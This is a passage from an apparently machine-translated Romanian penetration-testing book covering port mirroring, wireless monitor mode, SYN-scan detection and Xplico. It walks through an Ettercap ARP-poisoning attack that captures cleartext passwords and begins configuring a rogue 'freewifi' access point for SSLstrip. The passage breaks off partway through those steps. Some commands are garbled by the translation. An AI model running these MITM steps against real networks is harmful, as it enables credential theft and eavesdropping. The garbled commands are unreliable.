Capitolul 19 Capturarea traficului cu Port Mirroring
Pentru toate computerele conectate la rețea să proceseze pachetul de difuzare ARP
ar fi o risipă de resurse. În schimb, plăcile de interfață de rețea ale
dispozitivelor din rețea pentru care pachetul nu este destinat, recunosc că
pachetul nu este pentru ei, astfel încât pachetul este aruncat, mai degrabă decât să fie trecut
la CPU pentru procesare.
Utilizând modul promiscuu, vă puteți asigura că tot traficul este capturat.
Când funcționează în modul promiscuu, placa de interfață de rețea transmite
fiecare pachet pe care îl vede procesorului gazdă, indiferent de adresare.
Odată ce pachetul ajunge la CPU, acesta poate fi preluat de instrumentul numit
Wireshark pentru analiză. Există trei moduri principale de a capta traficul de la un
dispozitiv țintă într-o rețea comutată.
Prima este otrăvirea ARP, sau atacul Man-In-The-Middle, pe care tocmai l-am
împărtășit cu voi în capitolul anterior folosindu-le pe amândouă împreună.
A doua metodă de a capta traficul de pe un dispozitiv țintă într-o
rețea comutată este prin atingere. Cunoscut și sub denumirea de „Network Tap”, care este un
dispozitiv hardware pe care îl puteți plasa între două puncte finale ale
sistemului dvs. de cablare pentru a capta traficul dintre ele.
A treia metodă este Port Mirroring. Port Mirroring sau port spanning, este
poate cel mai simplu mod de a capta traficul de la un dispozitiv țintă într-o
rețea comutată.
În acest tip de configurare, trebuie să aveți acces la linia de comandă sau la
interfața de gestionare web a comutatorului pe care se află computerul țintă.
De asemenea, comutatorul de rețea trebuie să accepte oglindirea și să aibă un
port neutilizat în care puteți conecta sniffer-ul. Puteți configura Port Mirroring pe
majoritatea switch-urilor Cisco odată ce v-ați conectat la acesta, folosind fie „SSH”, fie un
cablu de consolă.
Pentru a activa oglindirea porturilor, lansați o comandă care forțează comutatorul să copieze
tot traficul de pe un port pe alt port. Dar mai întâi, ar trebui să enumerați porturile de pe un
comutator lansând comanda
„show ip interface brief”
Dacă nu sunteți familiarizat cu comenzile Cisco switch, nu vă faceți griji prea mult,
deoarece vom privi doar un exemplu simplu. După ce ați listat
porturile Ethernet disponibile, să presupunem că doriți să instalați sniffer-ul pe portul
2 și să redirecționați tot traficul de la portul 1 la portul 2.
Pentru a începe comenzile de configurare, mai întâi lansați comanda
„configure terminal”
de doar
„conf t”
Apoi apăsați enter. Apoi, trebuie să specificați portul sursă, care este portul 1
pentru exemplul nostru, astfel încât să începeți comanda tastând „monitor”, urmat
de un număr aleatoriu de sesiune.
Numărul de sesiune poate fi orice număr la alegere și apoi specificați
că este o sursă; si in final introduceti numarul portului.
Apoi tastați numărul portului de destinație și aici se
află snifferul. Aceeași comandă cu același număr de sesiune, dar de data aceasta este o
destinație și numărul portului este 2.
Comenzile pe care doriți să le introduceți sunt următoarele:
„conf t”
„monitor session 1 source interface GigabitEthernet1/0/1”
„monitor session 1 interfață destinație GigabitEthernet 1/0/2”
„exit”
„exit”
„write memory”
Pentru a vă verifica sesiunea de monitorizare, puteți tasta comanda „show
session” urmată de numărul sesiunii, în acest caz 1 după cum urmează;
„show session 1”
Rezultatul vă va arăta că portul sursă este GigabitEthernet numărul 1,
iar portul de destinație este GigabitEthernet numărul 2. După acești pași, tot
traficul va fi redirecționat de la portul 1 la portul 2.
Capitolul 20 Recunoaștere pasivă cu Kali
Oricine poate asculta semnalele wireless care trec prin aer. Când
ascultați semnale fără fir, vă puteți regla radioul pentru a asculta
traficul specific care merge către și de la un client sau către și de la un punct de acces sau
puteți pur și
simplu să ascultați totul și apoi să filtrați ceea ce doriți să ascultați. o
dată ulterioară.
La fel ca și cum ai pune mâna la ureche pentru a te ajuta să auzi mai bine sau
poate un pahar până la perete pentru a auzi conversația de cealaltă parte a peretelui
, cu wireless, poți folosi o antenă direcțională pentru a colecta mai mult semnal
putere dintr-o direcție dată.
Ceea ce înseamnă că pot fi la o anumită distanță de punctul de acces sau
de clientul dvs. și totuși pot captura traficul prin aer. Ceea ce înseamnă asta
este că nu știi că îți trag cu urechea traficul.
Dar cum pot asculta și capta traficul? Ei bine, ascult acordând radioul
la canalul de frecvență, colectând toate semnalele, procesând acele
semnale în stiva mea de protocoale și apoi afișându-le cu un
instrument de analiză de pachete, cum ar fi Wireshark.
Ascultarea prin aer este una dintre cele mai bune moduri de a face recunoaștere pasivă.
Recunoașterea pasivă este atunci când culegeți informații despre o
rețea, corporație sau un individ, dar nu vă implicați activ cu
sistemul, rețeaua sau cu individul.
Este posibil să culegeți informații, cum ar fi care este producătorul
punctelor lor de acces? Care sunt adresele MAC care sunt folosite de
clienți? Ce mecanisme de securitate folosește o anumită companie? Care sunt
numele rețelei? Au acces presupus setat la aceste puncte de acces?
Au nume de rețea ascunse?
Prin colectarea de informații, pe măsură ce începeți să vă formați o imagine a implementării
, astfel încât să puteți trece la a doua fază când începeți
să planificați modul în care veți ataca rețeaua.
În faza de recunoaștere pasivă, veți scrie și
formați o hartă a rețelei în care sunt instalate punctele de acces, scrieți
numele acestora și creați un plan de implementare și identificați orice
deficiențe pe care le-ar putea avea rețeaua. Dacă un hacker va încerca să
acceseze o rețea de întreprindere, wireless trebuie să fie una dintre primele trei
abordări pentru a descoperi informații pentru a planifica acel atac.
Pentru a captura și afișa traficul care trece prin aer aveți nevoie de un instrument numit
Wireshark. Puteți descărca Wireshark de pe site-ul lor web enumerat
anterior sau puteți utiliza instrumentul care este deja disponibil în Kali Linux.
Pentru a face acest lucru în Kali Linux, vom urma un proces în patru pași. Primul
lucru pe care îl vom face este să punem adaptorul nostru wireless în modul monitor.
Acest lucru va permite adaptorului nostru să adulmece totul prin aer, să captureze
totul și să-l transmită aplicației Wireshark pentru a fi afișat și
apoi putem analiza acele pachete.
Putem selecta totul prin aer sau putem căuta trafic dintr-un
anumit BSSID sau pe un anumit canal. Odată ce am selectat BSSID-ul
și/sau canalul, atunci putem deschide Wireshark, selectam
interfața de monitorizare pe care am configurat-o pentru adaptorul nostru wireless și începem
să capturam date.
Odată ce am capturat suficiente date, putem salva acea captură de pachet pentru a le
analiza ulterior.
Primul lucru pe care vrem să-l facem este să punem adaptorul nostru în modul monitor. În
capitolul anterior am discutat deja cum să faceți asta, dar puteți verifica pentru a vă
asigura că interfața dvs. wireless este încă în modul de monitorizare tastând:
„iwconfig”
Acest lucru vă va permite să vedeți în ce mod este interfața dvs. wireless, dar dacă nu ați
făcut alte modificări decât am discutat până acum, wlan-ul dvs.
ar trebui să fie încă în modul Monitorizare.
Există mai multe moduri de a activa modul monitor, cum ar fi utilizarea
„iwconfig”
, dar această metodă nu funcționează pentru toate adaptoarele. Această metodă nu
funcționează
pentru toate adaptoarele, așa că dacă ați încercat să activați în modul monitor folosind
comanda de mai sus și nu a reușit, sau dacă a funcționat, dar adaptorul nu s-a comportat așa
cum era de
așteptat atunci când îl utilizați, atunci o idee bună este să încercați să activați modul monitor
folosind o metodă diferită.
De exemplu, dacă adaptorul dvs. fără fir este în „modul gestionat” și nu știți
cum să îl introduceți în „modul de monitorizare”, remedierea este ușoară.
Primul lucru pe care îl puteți face este să dezactivați interfața tastând
„ifconfig lan0 down”
Acum puteți continua și activa modul monitor, dar înainte de a face asta este
bine să omorâți orice proces care poate interfera cu utilizarea adaptorului în
modul monitor. Pentru a face asta, trebuie să folosim un instrument numit „airmon-ng” Tip:
„airmon-ng check kill”
Aici îi vom spune lui Kali că vrem să verificați toate procesele care
pot interfera cu modul monitor și dacă găsești orice, vrem să-i
omori pe aceștia. Comanda foarte simpla.
Airmon-ng este în numele programului. „Verificare” înseamnă verificarea oricăror
procese care ar putea interfera cu modul monitor. „Uciderea” înseamnă a ucide
procesele dacă există.
Dacă apăsați enter, veți vedea că va ucide câteva procese și veți observa
că pictograma managerului de rețea dispare. Acest lucru se datorează faptului că această
comandă
o oprește și vă veți pierde conexiunea la internet dacă ați fost conectat, dar este
în regulă, deoarece veți pierde oricum conexiunea la internet dacă activați
modul monitor.
Procedând astfel, adaptorul funcționează mai bine în modul monitor. Acum
sunteți gata să activați modul monitor și, în loc să utilizați comanda
„iwconfig” ,
puteți folosi:
„airmon-ng start wlan0”
Încă o dată, airmon-ng este numele programului pe care îl folosim pentru a activa
modul monitor . „Start” înseamnă că vrem să pornim modul monitor, pe o interfață
numită „wlan0”
Acum, dacă interfața dvs. wlan nu este zero, ci 1 sau 2, doriți un loc cu
numărul potrivit în care să fac referire la zero cu numărul de
interfața dvs. fără fir . Odată ce apăsați enter, veți primi un mesaj care vă spune că
modul monitor este activat pe wlan0.
Acum, dacă tastați
„iwconfig”, veți vedea că interfața numită „wlan0” a dispărut.
Nu mai aveți o interfață numită „wlan0” și, în schimb, aveți o nouă
interfață numită „wlan0mon”, dar dacă vă uitați la modul acestei interfețe,
veți vedea că este în modul „monitor”.
După aceea, ori de câte ori doriți să utilizați un program care necesită modul monitor,
asigurați-vă că ați setat interfața la „wlan0mon”.
În cazul în care ați încercat să activați modul monitor folosind comanda
„iwconfig”
și nu a funcționat și apoi ați încercat și această metodă și tot nu a funcționat,
atunci sunt șanse ca adaptorul dvs. să nu accepte modul monitor, deoarece
nu toate adaptoarele acceptă modul monitor. Prin urmare, trebuie să verificați
capitolul despre adoptatorii recomandați.
Continuând, odată ce interfața este în modul Monitor, ar trebui să captați
traficul prin aer. Odată ce au fost colectate suficiente date, este timpul
să le afișați.
În Kali Linux, accesați Aplicații, până la Kali Linux Top 10
Instrumente de securitate și există Wireshark. Faceți clic pe acea filă și va apărea
aplicația Wireshark care listează interfețele dvs.
Selectați interfața wireless, în cazul meu este wlan0mon și faceți clic pe Start pentru a vedea
datele de captură. Dacă vă uitați la pachetele capturate, ar trebui să vedeți că există
o combinație de solicitări de trimis, clar pentru a trimite, un cadru de semnalizare și
unele date de utilizator.
Acum puteți salva toate aceste date făcând clic pe „Salvare” sau „Salvare ca” și
le puteți lua și analiza la o dată ulterioară. Este atât de ușor să captezi
informații prin aer.
Capitolul 21 Capturarea atacului de scanare SYN
Scanarea TCP SYN se bazează pe procesul de strângere de mână în trei căi pentru a determina
ce porturi sunt deschise pe o gazdă țintă. Atacatorul trimite un pachet TCP SYN
la o serie de porturi de pe victimă, ca și cum ar încerca să stabilească un canal pentru
comunicarea normală pe porturi.
Când se execută o scanare SYN, atacatorul va căuta trei stări.
Ori portul este deschis, închis sau filtrat. Strângerea de mână TCP normală funcționează astfel
.
Mai întâi, va fi trimis un pachet SYN, apoi serverul va răspunde cu un SYN/ACK
și, în final, clientul va trimite un pachet ACK.
Acum să aruncăm o privire la scenariul Open Port. Dacă un serviciu de pe mașina victimei
ascultă pe port, acesta primește pachetul SYN și va
răspunde atacatorului cu un pachet TCP SYN/ACK, iar atacatorul
știe că portul este deschis și un serviciu ascultă. aceasta.
Pentru scenariul Port închis, dacă niciun serviciu nu ascultă pe un port scanat, atacatorul
nu va primi un pachet SYN/ACK. În funcție de configurația
sistemului de operare al victimei, atacatorul ar putea primi
în schimb un pachet de resetare, care indică faptul că portul este închis.
În cele din urmă, pentru scenariul Port filtrat, atacatorul poate să nu primească niciun răspuns
. Aceasta ar putea însemna că portul este filtrat de un dispozitiv intermediar, cum
ar fi un firewall, sau gazda în sine.
Pe de altă parte, s-ar putea ca răspunsul să fi fost pierdut în tranzit. În acest
scenariu, imaginați-vă că aveți trei gazde; atacatorul care va folosi
Kali Linux la 10.0.0.111, mașina victimă va fi o gazdă Windows 10 la
10.0.0.202, în cele din urmă testerul de penetrare va folosi Kali Linux pentru a intercepta tot
traficul și a analiza orice atacuri în rețea.
Imaginează-ți că tu ești atacatorul. În primul rând, hackerul va
executa o scanare a portului împotriva mașinii tale Windows 10 victimă și va
folosi nmap pentru a scana gazda Windows la adresa IP 10.0.0.202. Comanda
care va fi folosită aici este:
„nmap 10.0.0.202”
Din perspectiva atacatorului, scanarea este completă, dar nu știe că
un tester de penetrare ascultă în acest moment în rețea.
Dacă treceți la aparatul de testare a penetrării și încercați să prindeți acest intrus,
cele mai bune modalități de a înțelege scopul unei scanări este să vizualizați
fereastra de conversații în Wireshark.
În meniul Wireshark, selectați elementul „Statistici”, apoi faceți clic pe
„Conversații”, apoi selectați fila „IPv4”.
Acolo, ar trebui să vedeți o singură conversație IPv4 între atacator la
adresa IP 10.0.0.111 și victimă la adresa IP 10.0.0.202.
Veți vedea, de asemenea, că există mii de conversații TCP între
aceste două gazde. Practic, o nouă conversație pentru fiecare port implicat în
comunicații, ceea ce este mult.
Odată ce ați înțeles diferitele tipuri de răspunsuri pe care le poate produce o scanare SYN,
următorul gând logic este să găsiți o metodă rapidă de a identifica porturile
deschise sau închise.
Răspunsul se află în fereastra conversațiilor. Încă o dată, faceți clic pe
fila „TCP”. În acea fereastră, puteți sorta conversațiile TCP după „
numărul pachetului” cu cele mai mari valori în partea de sus, făcând clic pe coloana „Pachete”
de două ori.
Apoi ar trebui să faceți clic pe „porturi scanate” și să includeți 3 pachete în fiecare dintre
conversațiile lor. Puteți arunca o privire asupra detaliilor primului pachet din
listă făcând clic pe butonul „Urmăriți fluxul”, apoi închideți această fereastră și
minimizați fereastra de conversații.
În fereastra principală a Wireshark, ar trebui să vedeți
pachetul SYN inițial trimis de la mașina atacatorului, apoi
pachetul SYN/ACK corespunzător de la gazda victimei și pachetul final de resetare trimis de la
gazda atacatorului pentru a încheia conversația.
Dacă reveniți la fereastra „Conversații”, puteți avea și alte
scenarii în care doar 2 pachete sunt implicate în comunicare.
Dacă verificați din nou detaliile, verificați primul pachet SYN inițial și al
doilea care este resetarea de la victimă, ceea ce indică faptul că acest port este
închis.
Dacă intrările rămase în fereastra „conversație” includ un singur
pachet, înseamnă că gazda victimei nu a răspuns niciodată la
cererea SYN inițială.
Capitolul 22 Capturarea traficului cu Xplico
Putem lansa un atac Man in the Middle în mai multe moduri, fie folosind
Burp Suite sau EtterCAP; dar nu am discutat niciodată despre cum putem colecta
datele și să le analizăm și ce instrument putem folosi în acest scop.
Am discutat anterior despre un software numit Wireshark și despre cum putem
captura date cu acesta, dar există un alt utilitar pe care îl putem folosi în același
scop, numit „Xplico”.
Xplico poate prelua și fișierele Wireshark și le poate analiza pentru dvs. Wireshark
are, de asemenea, capacitatea de a face un flux direct în Xplico, prin urmare, putem captura tot
traficul și poate oferi o altă imagine grozavă a ceea ce se întâmplă în acea
sesiune pe care o urmărim cu urechea.
Xplico vine și ca instrument implicit încorporat în Kali Linux. Pentru a lansa
interfața grafică cu utilizatorul, puteți urma opțiunile de meniu ca:
Odată ce ați selectat opțiunile de meniu menționate, acesta va lansa un
server web pe Kali. Dacă serverul web Apache nu rulează încă, în mod normal
trebuie să îl porniți manual; dar dacă folosești mașina ta Kali, o va
porni automat pentru tine.
Dacă Apache rulează deja în fundal, Xplico va folosi acea
funcție de server pentru a se lansa. În continuare, vă va spune să utilizați o anumită adresă
URL pentru a deschide
Xplico, folosind un server web.
Puteți alege să faceți clic pe linkul furnizat pentru a deschide Xplico sau puteți
doar să copiați și să lipiți adresa în sesiunea dvs. de browser. Link-ul este:
http://localhost:9876/
O altă metodă de a lansa Xplico este să faceți clic dreapta pe link-ul furnizat, apoi
selectați Open Link, iar acesta îl va deschide în browserul implicit; dar este corect
să menționăm că unele dintre funcțiile de meniu nu funcționează întotdeauna în
browserul implicit.
Prin urmare, vă sugerez să utilizați browserul Firefox prin copierea lipirii
linkului furnizat. Apoi, Xplico va deschide o
interfață grafică de utilizator bazată pe web, care ar necesita să fiți conectat folosind
următoarele detalii:
➢ Nume utilizator: xplico
➢ Parolă: xplico
Odată conectat ca xplico, pentru a analiza datele pe care le-ați
capturat anterior pe interfață de rețea ethernet0, trebuie să creați un nou caz făcând
clic pe o opțiune de meniu: Case > new case > Live acquisition.
Dacă doriți să analizați un fișier existent pe care l-ați salvat anterior, puteți
alege să faceți clic pe bara radio numită: „Încărcarea fișierelor de captură PCAP”
Odată ce creați un caz, îl puteți denumi indiferent de proiectul pe care îl faceți,
apoi puteți crea mai multe sesiuni în cadrul fiecărui proiect și puteți începe să
le vizualizați.
Xplico va oferi vizibilitate clară a oricărui site web, imagini sau videoclipuri pe care
victima le-a vizitat, fie ca format de captură live, fie reluând-le la orice
altă dată, în orice moment.
De asemenea, putem captura trafic VOIP (Voice over IP), pe care îl putem, de asemenea,
falsifica, șterge sau asculta oricând în viitor. Xplico este mai mult decât un
instrument de captare a datelor, dar datorită puterii sale este cunoscut și ca un
instrument de hacking foarte bun.
Capitolul 23 Atacul MITM cu Ettercap
În acest capitol vom discuta cum să folosim Ettercap pentru a captura
acreditări, în special nume de utilizator și parole de la o țintă folosind HTTP
și FTP.
Acest lucru este posibil dacă ținta utilizează două protocoale necriptate, cum ar fi
HTTP și FTP. În configurație avem un sistem Linux și un sistem Windows 10 și
vom folosi Ettercap pentru a ne pune la mijloc între
gateway-ul implicit, care este mașina gazdă Windows.
Pentru a obține adresa implicită a gateway-ului, trebuie să tastați un terminal;
„rută ip”
În cazul meu, gateway-urile implicite sunt 192.168.100.1, dar indiferent de adresa pe care o
aveți
, aceasta este informația principală pe care trebuie să le cunoașteți pentru ca Ettercap să
funcționeze.
Din punct de vedere tehnic, vă puteți pune între toți cei dintr-o subrețea și
gateway-ul implicit sau ținta individuală, dacă doriți. În acest scenariu, ne vom pune
între toată lumea și gateway-ul implicit.
Mai întâi în Kali Linux, accesați „Aplicații”, apoi derulați în jos și selectați
„Sniffing and Spoofing”, apoi selectați „Ettercap-g”. Aceasta este interfața grafică pentru
Ettercap. Odată ce interfața este deschisă, selectați „sniff”, apoi selectați „unified sniffing”
și va apărea următoarea fereastră.
În noua fereastră care este acum deschisă numită „Ettercap Input”, vă va întreba
pe ce interfață de rețea doriți să adulmecați. Există o singură
placă NIC sau interfață de rețea pe mașinile noastre Kali, ceea ce unifică sniffing-ul.
Prin urmare, indiferent de interfața afișată, ar trebui să mergeți cu asta, așa că selectați
„ok”. În continuare, înainte de a ne pune la mijloc cu Ettercap, trebuie să
configuram ținta. Pentru a face acest lucru, selectați „gazde”, apoi „scanați pentru gazde”.
Aceasta va scana subrețeaua în care se află ținta dvs. Vă puteți pune doar
la mijloc pe o subrețea dată cu „arp intoxicație”, ceea ce
vom folosi.
Odată finalizată scanarea, întoarceți-vă și selectați „gazde”, apoi „lista de gazde”, iar în
noua fereastră, ar trebui să vedeți Adresele IP pe care le-a găsit scanarea anterioară.
Aici ar trebui să găsiți și adresa IP a gateway-ului dvs. implicit, care în
cazul meu este 192.168.100.1.
Acum trebuie să creați ținte, așa că dacă faceți clic pe adresa IP
192.168.100.1 sau pe oricare adresă IP este gateway-ul dvs. implicit, apoi selectați
„Adăugați la țintă 1”.
Apoi, dacă aveți mai multe adrese IP listate, doriți să le vizați și pe acestea, așa că
încă o dată le puteți evidenția făcând clic pe ele, apoi faceți clic pe
„Adăugați la țintă 2”.
Odată ce ți-ai selectat țintele, mergi în fereastra de sus, apoi selectează
„Mitm”, care se referă la „om în mijloc”, apoi poți selecta „arp intoxicație”.
După ce le-ați selectat, va apărea o nouă fereastră,
ar trebui să bifați „Sniff remote connections” și să faceți clic pe „ok”
Dacă vă aflați la mijloc, sau ar trebui să spun dacă mașina Kali Linux este la
mijloc între Mașina Windows 10 și gateway-ul implicit, adresa MAC
pentru adresa IP 192.168.100.1 ar trebui să fie adresa MAC a mașinii Kali
Linux. Pentru a verifica acest lucru, ar trebui să accesați
linia de comandă a mașinii Windows 10 și să tastați:
„arpa”
Arp înseamnă Address Resolution Protocol și ceea ce face este că
traduce adresele Mac în adrese IP și, odată ce îl utilizați pe
Windows, ar trebui să vedeți lista de adrese IP și lângă fiecare
adresele MAC asociate acestora.
Apropo, asigurați-vă că nu sunteți confuz, deoarece Windows face referire la
adrese IP ca „Adrese de internet” și trimite adrese MAC ca
„Adrese fizice”
După cum vedeți „Adresele fizice” greșite din punct de vedere tehnic, deoarece folosind
Ettercap
tocmai ați schimbat adresa Mac a dvs. gateway implicit, dar pentru a fi 100%
sigur, puteți verifica și adresa mac Kali Linux.
Pentru a face asta, reveniți la terminalul Kali Linux și tastați:
„ifconfig”
Și în ieșirea pe care vi-l arată această comandă, căutați termenul „ether”
care se referă la MAC sau „adresa fizică” a adresei Ethernet Kali Linux
.
Odată ce ați verificat și adresa Kali ether este aceeași cu
gateway-ul implicit Windows, știți că vă aflați la mijloc cu Ettercap. Acum, lucrul
bun despre Ettercap este că atunci când ești la mijloc, aproape tot ce
trebuie să faci este să-l rulezi.
În fereastra Ettercap, în partea de jos, dacă vede acreditări
transmise în text clar, le va captura în acea fereastră. În fereastra Ettercap
veți vedea numele de utilizator lângă „USER” și parola lângă
„PASS”.
Va apărea automat în partea stângă, așa că nu trebuie să faceți prea multe
. De exemplu, nu trebuie să stai acolo și să te uiți la tot traficul ca în
Wireshark, deoarece atât numele de utilizator, cât și parola apar.
Ettercap captează orice nume de utilizator și parolă dacă sunt
utilizate protocoale necriptate, prin urmare, în loc de HTTP, HTTPS ar trebui să fie utilizator, în
timp ce, în loc de
FTP, ar trebui să utilizați SFTP sau SCP pentru a transfera fișiere.
Utilizatorul final nu observă niciodată când sunteți la mijloc, deoarece nu există niciun
banner de avertizare care apare utilizatorului, așa că nu va observa dacă faceți un
atac layer2 man-in-the-middle cu Ettercap.
În cele din urmă, vă voi cere din nou să vă asigurați că aveți autorizație scrisă
pentru utilizarea acestei metode într-un mediu live sau de producție, deoarece orice tip de
atac Man in the Middle este foarte periculos.
Capitolul 24 Atacul MITM cu SSLstrip
În acest capitol vă voi învăța cum să creați un punct de acces fals pe o
mașină virtuală Kali Linux. Pentru a finaliza acest atac, va trebui să aveți un
adaptor de rețea USB care acceptă atât modul monitor, cât și modul master.
Dacă nu aveți un adaptor de rețea USB care să accepte aceste
moduri de rețea, adaptorul de rețea pe care vi-l recomand este Alpha
despre care am vorbit mai devreme. A costat doar aproximativ 50 USD și puteți cumpăra unul
de la
Amazon, precum și din alte câteva locuri.
Înainte de a începe, vreau să explic cum funcționează acest atac. Pentru a-l ilustra, permiteți-
mi să vă ofer o prezentare generală la nivel înalt a modului în care funcționează acest atac.
Componentele principale
includ victima, atacatorul, punctul de acces fals și un
router cu conexiune la internet.
Ce se întâmplă, este că atacatorul este conectat la Internet, iar atacatorul
va partaja acea conexiune la internet printr-un adaptor de rețea USB
care acționează ca un punct de acces fals.
Când cineva se conectează la acel punct de acces fals, va putea accesa Internetul
. Lasă-mă să te ghidez prin acest proces. Primul lucru care se va
întâmpla este că victima se va conecta la punctul de acces fals, apoi
traficul de internet al victimei va fi direcționat prin punctul de acces fals către
atacator.
Odată ce atacatorul obține traficul de internet al victimelor, atacatorul va
manipula și înregistra traficul de internet al victimelor cu banda SSL și acest lucru îi va
permite atacatorului să forțeze victima să utilizeze HTTP, ceea ce, ca urmare, îi va
permite atacatorului să captura orice nume de utilizator și parole
introduse de victimă.
Odată ce banda SSL a terminat de manipulat și de înregistrat
traficul de internet al victimelor, atacatorul va redirecționa traficul de internet al victimelor către
router.
În cele din urmă, routerul va direcționa traficul de internet al victimelor către orice site web
cu care victima încearcă să comunice.
Ceea ce facem aici, este că ne plasăm între victimă și
site-ul web, astfel încât, în consecință, să putem vedea orice interacțiuni care au loc
între victimă și site-ul web, iar acest lucru este denumit și om în
atacul de mijloc.
Asta încheie explicația, așa că hai să mergem mai departe și să începem cu atacul
. Primul lucru pe care trebuie să-l facem este să ne conectăm la internet și vom
realiza acest lucru prin partajarea
conexiunii la internet a sistemelor noastre de operare gazdă cu mașina noastră virtuală Kali
Linux.
Aceasta este, în esență, o conexiune de rețea prin punte sau prin cablu și am ales să
o fac astfel, astfel încât să pot elimina necesitatea unui al doilea adaptor de rețea USB,
dar rețineți că dacă aveți un al doilea adaptor de rețea USB, puteți utiliza
pentru a vă conecta la internet direct de pe mașina dvs. virtuală Kali Linux.
În schimb, mă duc la noi metoda pe care sunt pe cale să o împărtășesc cu voi. Să mergem
mai departe și să ne conectăm la sistemul nostru de operare gazdă. Nu contează pe ce tip de
computer rulați mașina virtuală Kali Linux, atâta timp cât
o puteți utiliza pentru a vă conecta la Internet.
Mai întâi, mergeți mai departe și deschideți setările de rețea sau orice
aplicație de gestionare a rețelei pe care o folosește sistemul dvs. de operare. Pot să-l accesez
pe al meu din
bara de meniu de sus și apoi să găsim o rețea wireless la care să ne conectăm.
Rețineți că vă puteți conecta la orice rețea la care doriți, atâta timp cât are
o conexiune la internet și, dacă sunteți mobil, vă puteți conecta la
Android sau iPhone-urile dvs. care utilizează un modem USB 4G, un hotspot mobil sau
orice altceva . înseamnă o conexiune la internet pe care o aveți.
Odată conectat la internet pe sistemul dvs. de operare gazdă, trebuie să
îl partajați cu mașina noastră virtuală Kali Linux.
Așa că acum, mergeți mai departe și treceți la mașina noastră virtuală Kali Linux, iar în
bara de meniu de sus trebuie să deschideți meniul mașinii virtuale și apoi
să extindeți meniul adaptorului de rețea.
Dacă aveți mai multe adaptoare de rețea, utilizați-l pe cel din partea de sus. Ar trebui să
se numească adaptor de rețea și să nu aibă niciun număr după el.
Aici, trebuie să ne asigurăm că am setat adaptorul nostru de rețea să utilizeze
detectarea automată prin punte și acest lucru ne va permite să obținem o adresă IP și o
conexiune la internet de la routerul la care este
conectat sistemul nostru de operare gazdă.
Odată ce ați făcut această setare, puteți continua și permiteți
meniului mașinii virtuale să se restrângă, iar acum putem folosi acea rețea virtuală pentru a
stabili o conexiune la internet.
În continuare, să deschidem managerul nostru de rețea, apropo, puteți utiliza orice
manager de rețea aveți, iar aici trebuie să găsiți opțiunea care spune
„Rețea cu fir” și apoi să faceți clic pe „Conectați-vă”.
Dacă utilizați managerul de rețea implicit, ar trebui să vă conectați
automat, dar dacă nu sunteți, poate fi necesar să reporniți
mașina virtuală și ar trebui să vi se acorde o conexiune.
Dacă întâmpinați în continuare probleme, vă recomand să instalați
managerul de rețea „Wicd”. Mergând mai departe, acum că avem o conexiune la internet,
trebuie să găsim adresa IP a gateway-ului și să o notăm.
Să mergem mai departe și să închidem managerul de rețea și să deschidem un terminal
unde trebuie să tastați:
„spațiu de rută –n”
și apoi apăsați ENTER și mergeți mai departe și găsiți adresa IP a gateway-ului. În
configurația mea, este 192.168.0.1 și trebuie să notăm acest lucru, deoarece
îl vom folosi într-o comandă viitoare.
Puteți deschide un bloc de note sau, dacă doriți, puteți folosi o bucată de hârtie ceea ce
vă este convenabil și scrieți adresa IP a gateway-ului. Acum că
ne-am notat adresa IP a gateway-ului, trebuie să instalăm serverul DHCP.
Înapoi în terminalul Kali, vom tasta;
„apt-get install dhcp3-server”
și apoi apăsați ENTER. Aveți răbdare și lăsați-i suficient timp pentru a termina
instalarea serverului DHCP, iar odată ce instalarea este finalizată, trebuie să ne
configuram serverul DHCP.
Înapoi la terminal, să tastăm;
„nano /etc/dhcpd.conf”
și apoi apăsați Enter și ar trebui să aveți un
fișier de configurare DHCP D gol. Dacă nu este necompletat dintr-un motiv oarecare, mergeți
mai departe și ștergeți tot conținutul,
iar când sunteți gata, să începem să adăugăm setările noastre.
Mai întâi trebuie să tastăm:
„autoritativ;
și apoi apăsați ENTER și deplasați-vă în jos pe o linie, apoi tastați;
„default-lease-time 600;
apoi apăsați ENTER pentru a vă deplasa în jos pe o linie și tastați;
„max-lease-time 7200;”
și apoi apăsați ENTER pentru a vă deplasa în jos pe o linie, apoi tastați;
„subnet 192.168.1.0 netmask 255.255.255.0 {
Mai sus, după spațiu, se numește „paranteză cu fața spre înainte” și apoi apăsați
ENTER și mutați în jos o linie și apoi tastați;
routere opționale 192.168.1.1;
și apoi apăsați ENTER pentru a vă deplasa în jos pe o linie și tastați;
„opțiune subnet-mask 255.255.255.0;”
Apoi apăsați ENTER și deplasați-vă în jos pe o linie și tastați;
„opțiune nume-domeniu „freewifi”;
Apoi apăsați ENTER și mutați în jos o linie și tastați;
„opțiune domain-name-servers 192.168.1.1;
și apoi apăsați ENTER și mutați în jos o linie și tastați;
„interval 192.168.1.2 192.168.1.30;
}
și apoi apăsați ENTER pentru a vă deplasa în jos pe o linie și apoi introduceți o
paranteză orientată înapoi. Asta e tot ce trebuie să intrăm. Încă o dată, configurația dvs.
ar trebui să arate astfel:
autoritar;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
opțiune routere 192.168.1.1;
opțiunea subnet-mask 255.255.255.0;
opțiunea nume-domeniu „freewifi”;
opțiune domain-name-server 192.168.1.1;
gama 192.168.1.2 192.168.1.30;
}
Apoi, trebuie să salvați modificările pe care le-am făcut, așa că apăsați
tastele „ctrl + x” și apoi pentru a salva fișierul. Trebuie să apăsați tasta „Y” și apoi să
scrieți fișierul și să îl închideți.
Trebuie să apăsați ENTER, iar acum trebuie să găsim numele
adaptorului nostru de rețea USB, așa că mergeți mai departe și conectați-vă adaptorul de rețea
USB dacă
nu ați făcut-o deja, iar în terminal trebuie să introducem:
„airmon- ng”
și apăsați Enter și ar trebui să vedeți numele adaptorului de rețea listat
mai jos. Al meu se numește „wlan0” și probabil că al tău va fi ceva similar. Acum
că știm numele adaptorului nostru de rețea, trebuie să pornim
modul de monitorizare, așa că să scriem;
„airmon-ng start wlan0”
și apoi apăsați Enter și acordați-i un moment pentru a crea o interfață de monitor pentru
dvs. Un mesaj va apărea acolo pentru a spune că a fost
creată o interfață de monitor și se numește „mon0”.
Acum trebuie să creăm punctul nostru de acces fals, așa că să scriem;
„airbase-ng –c 11 ​-e freewifi mon0”
Pentru „mon0” trebuie să introduceți numele interfeței monitorului. În cazul meu
este „mon0”, apoi apăsați enter și acum că punctul nostru de acces fals este în funcțiune,
trebuie să facem unele ajustări la interfața tunelului, care este
o interfață pe care „baza aeriană” a creat-o automat pentru noi când am pornit
punctul nostru de acces fals. .
Prin urmare, să deschidem un nou terminal, dar să nu închidem terminalul
în care conducem o bază aeriană, pentru că avem nevoie de el pentru a continua să
funcționeze. În noul
terminal, vom tasta;
